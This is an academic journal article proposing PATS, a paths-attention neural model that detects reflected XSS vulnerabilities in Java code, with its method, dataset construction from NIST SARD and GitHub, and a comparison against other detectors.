Next Article in Journal
Cognitive Load Approach to Digital Comics Creation: A Student-Centered Learning Case
Previous Article in Journal
Comparative Analysis of Hybrid-Electric Regional Aircraft with Tube-and-Wing and Box-Wing Airframes: A Performance Study
 
 
Font Type:
Arial Georgia Verdana
Font Size:
Aa Aa Aa
Line Spacing:
Column Width:
Background:
Article

Detection of Reflected XSS Vulnerabilities Based on Paths-Attention Method

School of Information Science and Engineering, Shenyang Ligong University, Shenyang 110159, China
*
Author to whom correspondence should be addressed.
Appl. Sci. 2023, 13(13), 7895; https://doi.org/10.3390/app13137895
Submission received: 4 June 2023 / Revised: 30 June 2023 / Accepted: 4 July 2023 / Published: 5 July 2023
(This article belongs to the Section Computing and Artificial Intelligence)

Abstract

:
Cross-site scripting vulnerability (XSS) is one of the most frequently exploited and harmful vulnerabilities among web vulnerabilities. In recent years, many researchers have used different machine learning methods to detect network attacks, but these methods have not achieved high accuracy and recall rates and cannot effectively combat XSS attacks. Designing a model that can achieve high accuracy and truly proactive defense against reflected XSS vulnerabilities has become a top priority for maintaining user network security at this stage. In this paper, we propose a detection model for reflected XSS vulnerabilities based on the paths-attention method (PATS model). Firstly, the model converts vulnerability data into an intermediate representation of abstract syntax trees, then traverses the abstract syntax tree to generate multiple sets of syntactic paths, and then converts them into vector representations through word embedding matrices. The model extracts semantic features using attention mechanisms to improve training effectiveness by assigning appropriate weights to different sets of syntactic paths as it learns with neural networks, which realizes the transformation from passive defense to active defense. Additionally, in the dataset processing section, we point out the shortcomings of current research datasets and construct a reliable dataset composed of 1000 malicious samples from NIST and 10,000 benign samples from GitHub for experimentation purposes. Experimental results show that compared with other machine learning models, the paths-attention method can achieve an accuracy rate of 90.25% and F1-score of 81.62%, while reducing the training time by half to 30 h.

1. Introduction

As the most common channel for internet users to interact with the internet, websites not only provide various services for users but also store their important assets and sensitive information. However, when a web attack occurs, it can cause huge losses to businesses and erode user trust [1]. With the increasing complexity of website requirements in recent years and varying technical skills among programmers, vulnerabilities are becoming more frequent. Among them, XSS vulnerabilities are commonly exploited by attackers to achieve illegal purposes. Since 2017, the frequency of XSS vulnerability has ranked seventh on the entire network and has climbed to third place as of 2021. Attacks caused by XSS vulnerabilities have high levels of harm and universality. In recent years, as Web2.0 applications gradually become mainstream compared to Web1.0, which is more static in nature, Web2.0 is more interactive in nature than its predecessor. Web statistics show that 68% of websites on the Internet have potential XSS vulnerabilities. Some well-known domestic and foreign companies such as Facebook, Twitter, Baidu, Sohu, etc., have experienced attacks due to XSS vulnerabilities causing incalculable economic losses.
There are many types of XSS vulnerabilities, among which the reflective XSS vulnerability is more destructive and harder to prevent in advance. Reflective XSS (cross-site scripting) vulnerability is a common web application security vulnerability [2]. Attackers can use this vulnerability to execute malicious scripts on the victim’s browser, thereby stealing sensitive information or using the user’s identity to perform malicious operations. The principle of this vulnerability is that attackers inject malicious scripts into the response of a web application by constructing special links, forms, or other input parameters. When users visit infected pages, the malicious script will be executed, achieving the attacker’s goal. These injected scripts usually contain JavaScript code that can steal user cookies and data inputs, and even simulate user actions.
To prevent such attacks, developers and security testers need to conduct reflective XSS vulnerability detection on web applications [3]. However, traditional defense techniques do not perform well in detecting XSS vulnerabilities. Traditional defense techniques can be divided into passive defense and active defense methods [4,5]. Passive defense judges whether the server has been attacked by detecting the user’s request payload, thus performing passive defense. However, facing constantly evolving attack techniques, passive defense technology is somewhat inadequate. Active defense finds injection points of websites through black box testing to determine if there are XSS vulnerabilities and fixes them for active prevention purposes [6]. However, on one hand, black box testing requires a lot of time and computation for analysis; on the other hand, even if injection points are found, they still need to be combined with white box testing for vulnerability positioning [7]. This makes this method no longer applicable to large-scale website source code.
This article proposes a paths-attention-based model for detecting reflective-XSS-vulnerabilities that addresses issues related to low efficiency and poor accuracy associated with traditional methods used for detecting these types of flaws. The rest of the article is organized as follows: Section 2 introduces research results on this detection problem in recent years. In Section 3, we describe how to establish paths-attention methods for reflective-XSS-vulnerability detection. Section 4 presents simulation results and analysis of vulnerability detection experiments, while Section 5 provides a summary of the experiment. Finally, lists references used in this article.

2. Related Work

At present, combining machine learning algorithms with vulnerability detection methods is widely recognized as a direction with prospects and practical significance in the industry. However, it is not enough to achieve ideal detection results by simply combining simple algorithms. The combination of algorithms needs to consider multiple factors. There are also many branches in the field of machine learning, such as neural networks, deep learning, reinforcement learning, natural language processing, etc. For XSS vulnerability detection, many scholars have made attempts in various directions but have not formed a unified idea. This article summarizes these methods into categories and selects some representative research methods for illustration.
The research on XSS vulnerability detection based on dynamic analysis was proposed by Gu Jiateng and others, who conducted in-depth research on the deduplication method of web pages, designed the generation and combination method of payload units, formulated rules for complete attack payloads, and finally detected XSS injection points on web pages. There are two drawbacks to this method: firstly, it requires a very comprehensive rule library to achieve ideal detection results; secondly, even if an XSS vulnerability is discovered, it needs to be located through source code before it can be fixed. Therefore, dynamic detection has low efficiency and poor flexibility.
Chen Jing from Nanjing University of Posts and Telecommunications proposed an XSS vulnerability detection method based on taint analysis and fuzzy testing [8]. This method addresses the inefficiency problem of traditional XSS vulnerability detection methods by combining taint analysis and fuzzy testing techniques to narrow down the area where contaminated data sources are located, improve pollution propagation analysis efficiency, and then use fuzzy testing to automatically detect XSS vulnerabilities. Li Jie et al. proposed a dynamic taint analysis-based DOM XSS vulnerability detection algorithm [9], which uses a dynamic byte-encoded taint analysis method to construct a DOM model and modify the browser’s script engine for detecting DOM XSS vulnerabilities [10]. William Melicher proposed using machine learning lightweight hybrid methods to detect DOM XSS vulnerabilities [11]. This method aims at addressing the difficulty in detecting DOM-type XSS vulnerabilities by crawling 100 websites’ 18 billion JavaScript functions with crawler technology, marking 180,000 functions as vulnerable ones using pollution tracking technology, training DNN with this dataset, thus designing a low-latency high-recall function classifier. The pollution tracking analysis detection method marks some sensitive data as contamination sources and records their propagation paths. When sensitive data leaks occur, the entire propagation path is analyzed to locate the location of the XSS vulnerability. The biggest advantage of this approach is its high accuracy. However, pollution tracking and analysis require significant computation time that cannot meet current efficient iterative development cycles; moreover, programming language proficiency is required for conducting pollution analyses.
Song Zitao and others proposed a code vulnerability detection method based on graph neural networks [12]. They parsed the program source code into a slice dependency graph containing data dependencies and control dependencies, then used graph neural networks to learn the structure of the slice dependency graph. Finally, they used the trained neural network model to predict vulnerabilities in the test program source code. Chen Hao et al. developed a code vulnerability detection method based on graph neural networks [13]. By analyzing the intermediate representation of source code, they obtained control flow graph features of intermediate language, initialized basic block vectors using word embedding algorithm to extract semantic information from code, concatenated them to generate sample data for detection, and achieved intelligent function-level code vulnerability detection. Lei Cui et al. proposed a WFG similarity-based code vulnerability detection method, which slices CFG graphs with vulnerability-sensitive keywords, calculates node weights in CFG subgraphs to generate WFG graphs, uses bipartite matching algorithm to calculate WFG similarity, and thus completes similarity-based code vulnerability detection. Detecting XSS vulnerabilities from the perspective of graph neural networks is also an innovative approach. Analyzing website source codes and converting them into dependency or control flow graphs can eliminate language barriers and reduce manual costs while improving accuracy of detections as well. However, converting website source codes into graphs and learning their features requires significant computation power; moreover, convolution during learning by GNNs may cause loss of some feature information; therefore, although there has been improvement in efficiency and accuracy of detections it has not yet reached ideal levels.
Zhen Li et al. proposed a deep-learning-based software vulnerability detection system, which targets software source code and determines the importance of keywords by counting their frequency in the code and detects software vulnerabilities by forming code gadgets mixed with control dependencies. However, this method can currently only detect multicategory vulnerabilities related to API calls in C/C++ programs(version 17). Hao Sun et al. proposed a code vulnerability detection method based on code similarity [14], which introduced a dataset of (vulnerability–vulnerability) and (vulnerability–patch), and detected vulnerabilities by comparing the similarity between vulnerability–vulnerability pairs and the difference between vulnerability–patch pairs. This method uses Siamese networks, BiLSTM, and attention as detection models, treats website source codes as text from the perspective of natural language processing, and extracts feature from source codes using some natural language processing methods for XSS vulnerability detection. Although these methods using natural language processing can demonstrate high accuracy and recall rates, it is difficult for the above model’s code similarity-based detection method to distinguish between vulnerable features among similar codes.
This article proposes a code semantic-based reflection-type XSS vulnerability detection method to address the shortcomings of the existing model. The main research work is as follows:
  • From the perspective of code semantics, using the paths-attention model for reflection-type XSS vulnerability detection, applying advanced methods in natural language processing to the field of vulnerability detection, and adjusting experiments to obtain a superior detection model.
  • Constructing a reliable dataset. Currently, most datasets for reflection-type XSS vulnerability detection suffer from imbalanced positive and negative samples. To avoid this problem, this article selects files numbered WEC80XSS from the National Institute of Standards and Technology’s (NIST) Software Assurance Reference Dataset (SARD) as negative samples and real project code data as positive samples [15].
  • Implementing the vulnerability detection method. Based on a real-world vulnerability dataset, this article conducted simulation experiments that showed that our proposed vulnerability detection method has advantages in both efficiency and accuracy.

3. Vulnerability Detection Method Based on Paths-Attention

Through the analysis of relevant papers, it can be understood that the methods for vulnerability detection of XSS should be divided into three parts: dataset (data collection), model generation (i.e., which algorithm to use and how to process it), and results. The overall experimental process of this article is shown in Figure 1.
Starting from constructing the dataset, a reflective XSS vulnerability dataset suitable for model experiments is constructed by mixing publicly available datasets and converting using a code converter for training in the PATS model. The PATS model is constructed using paths: code semantic extraction and attention: attention mechanism, where adopting attention mechanism can improve the effectiveness of paths and enhance the efficiency of vulnerability detection.

3.1. Theoretical Analysis of Paths-Attention Vulnerability Detection Method

3.1.1. Analysis of Semantic Extraction Method for Paths-Attention

There are several typical solutions for extracting semantic features from code at the current stage, including convolutional neural networks (CNNs), recurrent neural networks (RNNs), or long short-term memory (LSTM) extraction methods [16]. Srinivasanlyer proposed a neural-network-based code summarization technique that uses LSTM models and attention mechanisms to extract features [17]. The purpose of this model is to use a completely data-driven approach to generate high-level summaries of source code. The CODE-NN mentioned in the model was trained on a new corpus automatically collected from Stack Overflow to complete semantic summaries of code snippets. Pavol Bielik’s probabilistic model PHOG is a probability model for generating code semantics, aiming to predict the semantics of code fragments [18]. This model solves a key problem by proposing an extensible and accurate probability model that can be reused across different tasks and programming languages and evaluates PHOG on a large and diverse JavaScript corpus containing 150,000 files.
However, the extraction models for the semantics of the above code all traverse the AST of code snippets to identify contextual nodes but ignore path information between nodes. Uri Alon proposed learning distributed representations of code to extract node path information [19]. The main idea of this method is to represent a code snippet as a single-length code vector and aggregate it. Unlike the models in previous studies, this method’s model decomposes a code snippet into syntax path groups in an AST and learns aggregated representations of syntax path groups through modeling. Syntax path groups include syntactic structure and semantic information as well as contextual relationships.
This section decided to adopt the paths-attention code semantic extraction method from a theoretical perspective. This method can not only extract information from AST nodes but also obtain path information by decomposing AST into syntax paths. To demonstrate the advantages of this method compared to other methods in terms of semantic extraction, this article conducted a separate quantitative evaluation of the code semantic extraction process during experimental design, using recognized evaluation standards to prove the superiority of the code semantic extraction method.

3.1.2. Semantic Extraction and Vulnerability Detection Compatibility Analysis of Paths-Attention

At present, there has been a research approach to vulnerability detection from the perspective of source code. However, most of the source-code-based detections remain at the level of similarity, keywords, or self-learning features. Here are also listed some representative detection methods.
Tree-LSTM: Hoa, Khanh, Dam, and others proposed an automatic feature learning method for predicting vulnerable software components [20]. This model takes Java source files as granularity, where each source file consists of imported Jar packages and a set of function methods. It uses tree-structured LSTM to extract features from each method and represent them with vectors. Then it uses pooling layers to output local features of the entire file. To handle cross-project situations, the authors cluster all tokens of the entire project’s files using k-means to form a codebook table with multiple token states/categories, generating global features based on this table. Finally, it combines global and local features and uses classifiers for vulnerability classification detection. The detection process of the whole model is shown in Figure 2.
From the figure, this model learns the source code files through an LSTM network. The output of the model is then fed into a pooling layer to obtain an aggregated feature vector. At the same time, bag-of-token states are used to generate global features for the entire file. After aggregating local and global features, the model uses them for vulnerability detection.
The difference between paths-attention and the above methods lies in the granularity of the source code data used, which is based on function-level rather than file-level. Firstly, most vulnerability features in source code only exist in a few lines of code, and using files as the granularity range is too large, making it easy to drown out vulnerability features in the entire feature vector. In addition, this model focuses on automatic feature learning, which undoubtedly greatly increases the system’s computational complexity and reduces its vulnerability detection efficiency. To avoid these drawbacks, paths-attention has made the following optimizations.
  • By using a function-based approach, the system reduces the learning cost for vulnerability features.
  • The introduction of attention mechanism enables the model to extract semantic information more effectively, and the detection efficiency is higher when finding vulnerability features in semantic features.
Code similarity: In Lei Cui’s vulnerability detection method based on code similarity, it is mentioned that most of the current research on using code similarity to detect vulnerabilities is based on the similarity of syntax structure and semantic features of the code. However, the biggest drawback of such methods is that they cannot distinguish between code fragments with similar semantics. Sometimes, even if the semantics are very similar, slight differences can lead to one having a vulnerability while another does not. To address this issue, Lei Cui proposed using a Siamese network combined with a bidirectional LSTM network and introduced an attention mechanism based on this foundation. The entire model processing process is shown in Figure 3.
From the figure, the author introduced common vulnerabilities and exposures (CVE), which specifies that two identical vulnerabilities in different versions should be considered similar; conversely, if a vulnerability is eliminated by patch code, the vulnerability and patch code should be considered different. This method avoids the drawbacks of similar semantic code fragments.
Due to the strict selection criteria mentioned above for CVEs, the sample size is relatively small. Therefore, the author used metric learning to conduct training. This method labels similar vulnerability functions as 1 and dissimilar patch functions as 0. By training and learning the vulnerability matching degree between functions and function libraries, if it exceeds a certain threshold, it is judged to have vulnerabilities.
The detection method proposed by Lei Cui in the article has a major drawback. If it is necessary to detect vulnerabilities by comparing the similarity between vulnerable functions and detected functions, then the sample coverage needs to be large enough and the feature quantity needs to be rich enough to achieve more comprehensive detection. However, the sample selection method mentioned in his method is too strict, which limits the range of samples that cannot be sufficiently abundant. Therefore, although this method avoids the problem of vulnerability detection between semantically similar codes, it has significant limitations.
Paths-attention has made the following optimizations to avoid these drawbacks:
1.
Difficulty in distinguishing between code snippets with similar semantics: The paths-attention method starts from the syntax path and decomposes code snippets into groups of syntax paths. Similar semantics may have similar syntactic structures, but the importance of deeper syntactic paths is not necessarily the same. The semantic analysis process for two similar pieces of code is shown in Figure 4.
From Figure 4, although the two code snippets have similar syntax and structure, after parsing the syntax paths, it is found that the semantic focuses of the two code snippets are different. The red lines in the figure represent the most prominent syntax features, with other lines decreasing in order. Similar code snippets can be well distinguished in the PATS model.
2.
Issue of feature coverage range of the dataset: The model samples are selected from the National Institute of Standards and Technology (NIST) in the United States. After processing, a relatively rich set of samples can be used for training to allow the model to learn semantic features of vulnerability code snippets as fully as possible. This enables the model to have both high accuracy and fast detection capabilities.
In summary, the semantic extraction method based on paths-attention is theoretically very suitable for detecting reflected XSS vulnerabilities.

3.2. The Composition of the Paths-Attention Vulnerability Detection Method

Another part of the PATS model is the introduction of attention mechanism. Figure 5 shows the architecture of the attention mechanism. From the figure, we can see that by path context, data can be preprocessed before entering the fully connected layer. After being processed by the fully connected layer, gradient information is not only passed to the preliminary aggregated vector but also to the attention vector. The generation of the final semantic vector v also involves participation from the attention vector. By incorporating attention mechanism, it helps focus on key information for tasks and calculates attention weights so that the model can automatically learn which parts are more important in reflective XSS vulnerability detection problems, thus making more accurate predictions, classifications, and generations. Additionally, introducing attention mechanism helps establish global contextual relationships for models to automatically pay attention to information most relevant to current positions, thereby better serving as a semantic extraction method utilized by the PATS model. This achieves precise detection of reflective XSS vulnerabilities.
In subsequent sections, we will specifically explain code mapping (formation of AST tree) and provide details about the attention algorithm process.

3.2.1. Source Code Function Preprocessing

This article parses Java source code into an abstract syntax tree (AST) using function methods as the granularity. This process ignores some code details such as comments, blank lines, and punctuation. Each node in the AST represents a keyword that appears in the source code. The AST defining a code snippet is represented as a tuple throughout the entire process. < N , T , X , s , δ , φ > . In this tuple, N is a set of path nodes, T is a set of terminal nodes, X is a set of values, s N is the root node of the tree, δ : N ( N T ) * is a function that maps a path node to its list of child nodes, and φ : T X is a function that maps a terminal node to an associated value. All nodes except the root node appear in the child node list only once.
An AST path of length k is a sequence of the form n 1 d 1 , , n k d k , where n 1 , n k + 1 T are terminal nodes. For i [ 2 , k ] , n i N is a nonterminal node, and for i [ 1 , k ] , d i { , } is the direction of tree movement. If d i = , then n i δ ( n i + 1 ) , and if d i = , then n i + 1 δ ( n i ) . For an AST path p, this paper uses start(p) to represent n 1 and end(p) to represent n k + 1 .
By using the above two methods, this paper defines a context path as a tuple < x s , p , x t > , which consists of an AST path and the values associated with its terminals. Here, x s = φ ( s t a r t ( p ) ) and x t = φ ( e n d ( p ) ) are the values associated with the starting and ending terminals of the path p.

3.2.2. Code Mapping

In this paper, the feature function Rep is used to convert code snippets into mathematical objects for learning models. Given a code snippet C and its corresponding AST < N , T , X , S , δ , φ > , the set of all AST terminal node pairs is denoted by TPairs, as shown in Formula (1):
T P a i r s C = { ( t e r m i , t e r m j ) | t e r m i , t e r m j t e r m N o d e s ( C ) i j }
The termNodes represents the mapping between the set of terminal nodes in the code snippet and AST. In this paper, C is represented as the set of path contexts derived from it, as shown in Formula (2):
R e p ( C ) = x s , p , x t t e r m s , t e r m t TPairs C : xs = ϕ ( terms ) xt = ϕ ( termt ) start ( p ) = terms end ( p ) = termt
The variable c can be represented as a collection of < x s , p , x t > , where x s and x t denote the values of AST terminals, and p represents the AST path connecting them.
The components that need to be learned in the above model include the embeddings of paths and values (vocab_value and vocab_path) and a fully connected layer (matrix W). Two embedding vocabulary matrices, vocab_value, and vocab_path, are defined in this paper, where each row of the matrix corresponds to an embedding associated with a specific object. This is represented by Formulas (3) and (4):
v o c a b _ v a l u e R X × d
v o c a b _ p a t h R P × d
The set X represents the collection of observed AST terminal values during the training process, while P represents the set of AST paths. The width of the matrix W is the embedding size d N , which is a hyperparameter determined by various constraints such as training time and model complexity. A set of path-context pairs B = { b 1 , , b n } is extracted from the given code snippet and input to the network, where b i = < x s , p i , x t > denotes one of the path-context pairs, and x s and x t are the values of AST terminals, and p i is the path connecting them. Both the paths and contexts are mapped into their respective embedding spaces, and the three embedding spaces are concatenated into a single context vector, as shown in Formula (5):
c i = embedding x s , p i , x t = voca b value s ; voca b path j ; voca b value t R 3 d
As each c i is generated by concatenating three independent vectors, the fully connected layer learns to combine them. The c i combines the context vector and is the output of the fully connected layer. This is expressed mathematically as shown in Formula (6):
c i ~ = t a n h ( W · c i ) .
The weight matrix W R d × 3 d is a trained matrix, and the hyperbolic tangent (tanh) function is applied. The height of the weight matrix W determines c i . Tanh is a hyperbolic tangent element-wise function, which is a commonly used monotonic nonlinear activation function with outputs ranging from (−1,1), increasing the expressive power of the model. The fully connected layer multiplies the size 3d context vector with the weight matrix to transform it into a size d combined context vector and then applies the tanh function elementwise to each vector element to transform it to the range of (−1,1).

3.2.3. Attention Mechanism

The biggest technical challenge of the PATS model is to combine the training model with attention mechanism. Through experiments, it was found that using the above method to map code snippets into vectors did not achieve ideal detection results in XSS vulnerability classifiers. However, inspired by neural translation models in natural language processing, it was discovered that not all syntax paths are equally important. An algorithm is needed to highlight more distinctive syntax paths, so attention mechanism is introduced.
The attention mechanism works together with context vectors and continuously learns how to assign appropriate weights for different syntax paths, as shown in Formula (7) during calculation.
attention   weight   α i = exp ( c ~ i T α ) j = 1 n exp ( c ~ i T α )
To better demonstrate the role of attention mechanism in the model, a Java code snippet is selected in the text, for example, as shown in Code Snippet Figure 6.
The above code snippet will be converted into an AST in this article, and the attention mechanism will annotate it according to the importance of paths in the AST. The conversion result is shown in Figure 7.
From Figure 6, a code snippet can be decomposed into many paths. The red syntax path is the one with the richest semantic feature information, followed by the blue and green paths, and finally the orange path. Other unmarked paths will also be used as input for training but will not receive more attention. Therefore, a mechanism that can assign different attention to syntax paths is needed. To this end, this model introduces an attention mechanism.
The aggregated code vector v R d represents the entire code snippet. v is determined by the combination of the contextual vectors c 1 , , c n and their attention weights. The specific process is shown in Formula (8):
code   vector   v = i = 1 n α i · c i ~
At each forward propagation step, a c i ~ is obtained, and the attention vector for the current step is calculated based on c i ~ . Then, the backpropagation algorithm is used to update the weights of each neuron. When the gradients of the model converge, the final code vector is obtained by combining the current α i   a n d   c i ~ . Once the model converges, the aggregated semantic vector of the code snippet is outputted.
The algorithm for extracting the semantics of the entire code is as follows: Algorithm 1: Algorithmic process of neural network attention mechanism.
Algorithm 1: Neural Network Attention Mechanism
Input: Code snippet D
Output: Vector V
Process:
  Step 1: Convert code snippets to AST;
  Step 2: Traverse the AST to parse the syntax path, store the value of each node in a matrix called “vocab value”, and store the path in “vocab path”;
  Step 3: Embed the set of discrete vector groups into a continuous space and combine them into a single vector c i
    Step   4 :   Calculate   the   dot   product   of   weight   matrix   W   and   c i ,   and   map   the   result   to   ( 1 , 1 )   through   activation   function   tan h .   The   result   is   denoted   as   c i ~
   Step   5 :   Compute   the   dot   product   between   c i ~   and   the   global   attention   vector   α ,   then   normalize   to   obtain   the   weight   α i   for   each   c i ~
   Step   6 :   Add   up   the   weighted   values   α i multiplied   by   their   corresponding   c i ~ to obtain the aggregated vector v.

4. Experimental Design and Analysis

After training the PATS model with the dataset, we obtained the final experimental results. The experimental results will be analyzed in two parts: semantic extraction results and XSS vulnerability detection results. Analyzing the semantic extraction results can prove that the model used in this paper for code snippet semantic extraction has advantages over other models and can maximize the preservation of code semantics, providing a basis for subsequent code XSS vulnerability detection; analyzing XSS vulnerability detection results can prove that the proposed code-semantic-based XSS vulnerability detection method is effective compared to other vulnerability detection methods.

4.1. Dataset Construction

In this section, we encountered the problem of imbalanced positive and negative samples when selecting a dataset for detecting reflected XSS vulnerabilities. After comparing with other datasets used in previous research, we roughly divided them into two categories: open-source project datasets and PROMISE datasets. However, both types of datasets have the defect of imbalanced positive and negative samples. The statistics of positive and negative samples for these two types of data are shown in Table 1.
The proportion between positive and negative samples in the two datasets described in Table 1 is at most only 0.4866% and at least only 0.05265%. Imbalanced samples can lead to serious bias problems, resulting in high accuracy of the model but a low AUC.
To solve the problem and ensure the authenticity of the data, the experiment combined two reliable datasets. On one hand, it adopted the Software Assurance Reference Dataset (SARD) from the National Institute of Standards and Technology (NIST) [21], extracted 1000 XSS vulnerability samples from files with the code WEC80_XSS in this dataset as negative samples; on the other hand, it selected 10,000 function methods from the source code of top 10 Java projects on Git Hub as positive samples for this section. According to the description of privacy policy on the official website of NIST in the United States, a new privacy protection risk framework has been proposed to maximize the avoidance of risks caused by privacy issues. GitHub selected 10,000 positive sample source codes, so it does not involve personal privacy. Therefore, the dataset construction process for the experiment effectively avoids ethical issues and privacy risks. The final ratio of positive to negative samples is 10%. The dataset was divided into a test set of 25% and a training set of 75%.

4.2. Data Preprocessing

First, it is necessary to perform labeling processing on the dataset. This article divides the dataset into two categories: one is samples with vulnerabilities, labeled as 1; the other is samples without vulnerabilities, labeled as 0. The vulnerability detection model will be supervised by the labels of the dataset during learning to learn how to distinguish vulnerability features and achieve the goal of detecting XSS vulnerabilities. Code snippets with XSS vulnerabilities will be marked as “1”, as shown in Figure 8.
This code snippet is excerpted from real backend code of a web project. Its purpose is to receive the request body from the user on the frontend page, which includes form information submitted by the user. The part highlighted in red in the code snippet is a method for checking user input. Without this check, there may be an XSS vulnerability in this function. In other words, checking user input is one of the significant characteristics of an XSS vulnerability, so this section of code has been marked as 0 in the dataset.
Additionally, since there may be empty data, duplicate data, and noisy data in the crawled projects’ data, to better train the model and reduce the impact of dirty data on training results in the dataset, we removed duplicate and null values from the dataset and filled new data until they reached 11,000 records.

4.3. Model Parameters

To determine the hyperparameters of the model during the experimental process and optimize the overall performance of the model, this article ultimately determines the hyperparameters under the conditions of combining the above system environment and computing power.
K = 200, which means the maximum length of each syntactic path is 200.
d = 128, which means the dimension size of the discrete vector for each syntactic path is 128. Therefore, the input and output dimensions of the fully connected layer are 3d = 384, which also determines that the dimension of global attention vector α i   is 128.
The optimizer used in the model is Adam, dropout rate is 0.25, and cross-entropy loss function is used.

4.4. Analysis of Semantic Feature Extraction Results

The semantic extraction model of this section refers to the model proposed by Uri Alon in the study of code distributed learning. The model uses semantic feature vectors to predict function names for code snippets. By citing the comparative results between the experimental model and other models in this research, it demonstrates the advantages of the proposed model in the semantic extraction process, thereby proving the rationality of selecting this model. The feature extraction method based on Paths + CRFs was not implemented in this paper, so only data from Uri Alon’s work can be cited. The comparison results of the models are shown in Table 2. Zhen Li et al.’s software vulnerability detection system based on deep learning reduces the conversion process of graph features compared with graph neural network methods and reduces feature loss during the training process. Using a single natural language processing method can achieve high accuracy and recall rates. However, the detection method based on code similarity proposed by the model makes it difficult to distinguish vulnerability features between similar codes. Therefore, it is not included in the subsequent experimental comparison. In this experiment, only the mainstream CNN model optimized with attention mechanism and LSTM model also optimized with attention mechanism are compared with the PATS model.
From the table, for sample data detection, the paths-attention model has an accuracy of 63.3% and a recall rate of 56.2%, while the highest accuracy among other models is only 47.3%.
Emphasis is placed on measuring the processing speed of the model. It can be seen intuitively that the processing speed of the model used in this method can reach 1000 samples/second, which outperforms other models. This means that paths-attention model has higher processing efficiency when dealing with XSS vulnerability code samples. To better demonstrate the advantage of this model in terms of processing speed, this section presents a statistical analysis of the impact of training time for different models on F1 scores, as shown in Figure 9.
From Figure 9, this model approaches convergence after training for 30 h, and the F-1 score is much higher than the other three models. In contrast, the other three models require at least 72 h of training and need a long time to converge even after that.
Based on the analysis of the experimental results mentioned above, the model used in this article is superior to other research in terms of accuracy and processing speed for semantic feature extraction of vulnerability source code samples, ensuring the quality of subsequent vulnerability detection results.

4.5. Analysis of XSS Vulnerability Detection Results

Currently, traditional model methods do not have good detection capabilities for XSS vulnerabilities. Through the research of other scholars, it is known that N-gram [23], Tree-LSTM [24], and Siamese network [25] are three models that are relatively good at detecting XSS vulnerabilities in terms of comprehensive ability. Therefore, they were set as control groups in this experiment. However, these three models did not specifically address reflected XSS vulnerabilities during construction. The three models N-gram, Tree-LSTM, and Siamese network were not specifically designed to address reflected XSS vulnerabilities during their construction. To compare them better and objectively with the PATS model proposed in this paper, adjustments were made based on the source code provided by the model authors so that they could detect reflected XSS vulnerabilities. However, this also reflects another advantage of vulnerability detection models based on code semantics: they are not constrained by programming languages. In the final experiment, the experimental parameters from Section 4.3 were used, and a test dataset consisting of 25% of the total dataset was utilized for detection experiments. The following indicator values were obtained: accuracy (ACC), true positive rate (TPR), false positive rate (FPR), and F-1 score, which is a comprehensive evaluation of precision and recall used to balance the model. The comparison results of the models are shown in Table 3.
As concluded in the previous theoretical analysis section, the accuracy of the PATS model can reach 90.25%, while the tree-structured LSTM is 83.02% and has a recall rate of 74.52%. From the results, compared to other models, the PATS model has an advantage.
In addition to these evaluation criteria, the detection speed of these models was also compared. The comparison of model detection speeds is shown in Table 4.
It is worth noting that the training time in the table excludes the time for data representation conversion during processing, and only counts the time consumed by model training and testing for one iteration. Nevertheless, the PATS model still demonstrates significant advantages over other models in terms of comprehensive detection time and accuracy.
During the experiment, we compared the impact of different convolutional layers on model detection results, selected one to five fully connected layers, and compared direct connection with residual connection. The results are shown in Figure 10.
It can be seen intuitively that when the number of directly connected layers is greater than two, the accuracy begins to decline, while the residual connection starts to decline when it exceeds three. We compared the training and detection time of models with one-layer direct connection and three-layer residual connection, as shown in Figure 11.
From the figure, the training time of the model with three layers of residual connections is much longer than that of the model with one layer of direct connections. Reflected XSS vulnerability detection requires high timeliness, and zero-day vulnerabilities are the most harmful period for a vulnerability, so it is important to fix them before they are exploited. Zero-day vulnerabilities refer to security vulnerabilities that are immediately exploited once discovered. With advances in attack techniques, vulnerabilities that used to take months to exploit can now be cracked and attacked in just a few days. Therefore, this is undoubtedly a huge challenge for vulnerability detection technology. After considering both timeliness and accuracy indicators, this article ultimately chose a neural network with one layer of direct connection.

4.6. Melting Experiment

When describing the model construction ideas in this article, attention mechanism is proposed to improve the model’s ability to extract code semantics, which has a significant improvement. At the same time, to quantify the specific impact of attention mechanism on the experimental results of this article’s model, we conducted ablation experiments. In this paper’s ablation experiment, we removed the attention vectors. As a result, the output of fully connected layers can only be transmitted to aggregation vector, as shown in Figure 12.
Through quantitative analysis, after canceling the attention mechanism, the model’s regression rate and F-1 score have both significantly decreased. The main reason for this is that the model assigns equal weight to unimportant syntactic path groups, and many of these unimportant code snippets may come from common code. The model cannot distinguish the impact of common code, ultimately leading to a decrease in model detection quality. Therefore, it is evident that introducing an attention mechanism would greatly improve this model.

5. Conclusions

This article proposes a detection method for reflected XSS vulnerabilities based on paths-attention. This method extracts semantic information and syntax features from the code to obtain the vector representation of the code, which is then used for detecting reflected XSS vulnerabilities. Firstly, by analyzing the principle of reflected XSS vulnerabilities and relevant research, it is found that semantic extraction methods can be utilized. Secondly, considering the inefficiency and unclear results caused by using a single semantic extraction model, an attention mechanism is introduced in the construction structure of the model theory. The original data are transformed into input variables and processed through fully connected layers, and then detailed explanations are given on what attention mechanism is, why it should be introduced, and how to introduce it. After combining semantic extraction methods with attention mechanisms and training with datasets, the PATS (paths-attention-based detection method) model is obtained. The main contribution of this paper lies in proposing the PATS model when there is no effective solution for reflected XSS vulnerabilities currently available. It has been proven that PATS significantly improves detection accuracy and exhibits excellent performance. In experiments comparing PATS with other semantic extraction models in terms of feature extraction, both accuracy rate and F-1 score show an improvement of over 50%. Furthermore, experiments using the PATS model compared with other related models for XSS vulnerability detection demonstrate that even under significant speed conditions, it still achieves an accuracy rate above 90%. Utilizing a combination of semantic extraction and attention mechanism methods in PATS outperforms traditional vulnerability detection models. In practical applications, real-time monitoring can be achieved by installing detection software based on the PATS model while calling user traffic databases for detection purposes, since each piece of data undergoes code transformation and the semantic extraction process, effectively avoiding privacy-related issues as well as other concerns. However, the current combination of semantic extraction methods with attention mechanisms only focuses on testing existing datasets related to reflected XSS vulnerabilities; it does not achieve significant performance improvement for other types of vulnerabilities, such as DOM-based vulnerabilities. In the future, efforts will be made to achieve good detection results for more types of XSS vulnerabilities by increasing computational power models and making appropriate adjustments to the structure.

Author Contributions

Conceptualization, Y.X. and X.T.; methodology, Y.X.; software, T.W.; validation, B.L., T.W. and X.T.; formal analysis, Y.X.; investigation, B.L.; resources, X.T.; data curation, T.W.; writing—original draft preparation, Y.X.; writing—review and editing, T.W. and X.T.; visualization, T.W.; supervision, B.L. and Y.X.; project administration, X.T.; funding acquisition, X.T. All authors have read and agreed to the published version of the manuscript.

Funding

